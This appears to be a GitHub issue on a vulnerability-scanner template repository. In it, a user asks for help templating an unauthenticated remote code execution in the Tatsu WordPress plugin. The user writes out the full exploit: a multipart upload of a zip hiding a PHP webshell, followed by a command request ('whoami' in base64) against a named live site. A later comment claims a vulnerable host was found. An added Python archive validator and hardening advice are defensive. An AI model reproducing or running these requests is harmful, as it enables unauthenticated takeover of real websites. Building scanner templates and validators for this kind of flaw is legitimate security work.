projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
8.95k stars 2.56k forks

Tatsu < 3.3.12 - Unauthenticated RCE - help #4247

Open akincibor opened 2 years ago

akincibor commented 2 years ago

Hi,

Can someone help me convert this Python PoC into a template?

https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd

DhiyaneshGeek commented 2 years ago

@akincibor I checked the plugin, it seems to be a paid version: https://tatsubuilder.com/

Let me know if I'm wrong.

akincibor commented 2 years ago

Hi @DhiyaneshGeek

The first request uploads a zip file (example.zip) containing a PHP file (.examplefile.php):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 509
Content-Type: multipart/form-data; boundary=5e77a7410a108fe824da522d90cb1200

--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="action"

add_custom_font
--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="file"; filename="example.zip"

PK\x03\x04\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00.examplefile.php\xb3\xb1/\xc8(PPIS\xb0UP\xca\xc9M\xad,.Q\xb2vPI\xb4\x05\nE\x9b\xc4\xea\x01Ic0\ta\x9b\x82I#0i\x18\x0bTX\x9e_\x94R\x0c\xd4\x9bXT\x94X\xa9\x91\x94X\x9cjf\x12\x9f\x92\x9a\x9c\x9f\x92\xaa\xa1\x12\x1f\xe0\x1f\x1c\x12\xad^\x92ZQ\xa2\x1e\xab\xa9i\xad\x92e\xab\x04V\xa8\xa4\xa7\x14\x0f\xc4i\x999%\xa9E \xfb \xac\xd4\x94x\x98y*Y\x1a\x10\xb3u\x14T\x125\xad\x1dJ\xf3r2\xf3\xb25\xe2\xe3\xdd<}\\\xe3\xe35\xad\x01PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00.examplefile.phpPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x008\x00\x00\x00\xba\x00\x00\x00\x00\x00
--5e77a7410a108fe824da522d90cb1200--

It should be uploaded to the endpoint /wp-content/uploads/typehub/custom/example/.examplefile.php

The second request is:

POST /wp-content/uploads/typehub/custom/example/.examplefile.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 7
Content-Type: application/x-www-form-urlencoded

text=d2hvYW1p

d2hvYW1p is base64(whoami).
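
The two-request chain above (a zip accepted by the `add_custom_font` action, then the extracted PHP file requested directly under `/wp-content/uploads/`) is exactly the kind of archive a font-import handler has to refuse before extracting it. Added example, not code from this thread or from the Tatsu plugin: a Python check over an in-memory zip that flags hidden entries, non-font extensions, executable extensions smuggled into the name, and path traversal; the allowed-extension list is an assumption, and `build_archive` only constructs sample input.

```python
import io
import zipfile
from posixpath import normpath

# Font types an upload handler would legitimately expect (assumption for this
# example; the plugin's real allow-list is not stated in the thread).
ALLOWED_FONT_EXTENSIONS = {".ttf", ".otf", ".woff", ".woff2", ".eot"}
EXECUTABLE_PARTS = {"php", "phtml", "phar"}


def build_archive(entries: dict[str, bytes]) -> bytes:
    """Build an in-memory zip; used only to construct sample input here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def inspect_font_archive(data: bytes) -> list[str]:
    """Return reasons to reject the archive; an empty list means it looks safe."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]
    for info in archive.infolist():
        if info.is_dir():
            continue
        name = info.filename
        norm = normpath(name)
        # Entry names are attacker-controlled paths: refuse anything that could
        # escape the extraction directory.
        if name.startswith("/") or "\\" in name or norm == ".." or norm.startswith("../"):
            findings.append(f"{name!r}: unsafe path")
            continue
        basename = norm.rsplit("/", 1)[-1].lower()
        # Hidden files (the PoC ships '.examplefile.php') are never fonts.
        if basename.startswith("."):
            findings.append(f"{name!r}: hidden file")
        parts = basename.split(".")
        ext = "." + parts[-1] if len(parts) > 1 else ""
        if ext not in ALLOWED_FONT_EXTENSIONS:
            findings.append(f"{name!r}: disallowed extension {ext or '(none)'}")
        # 'font.php.ttf' style names try to smuggle an executable extension past
        # a last-extension-only check.
        if EXECUTABLE_PARTS & set(parts[1:-1]):
            findings.append(f"{name!r}: executable extension embedded in name")
    return findings
```

Rejecting the archive is only half the fix; the uploads directory should also be served with PHP execution disabled so a file that slips through is never run.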

akincibor commented 2 years ago

I think I found a vulnerable host, check Discord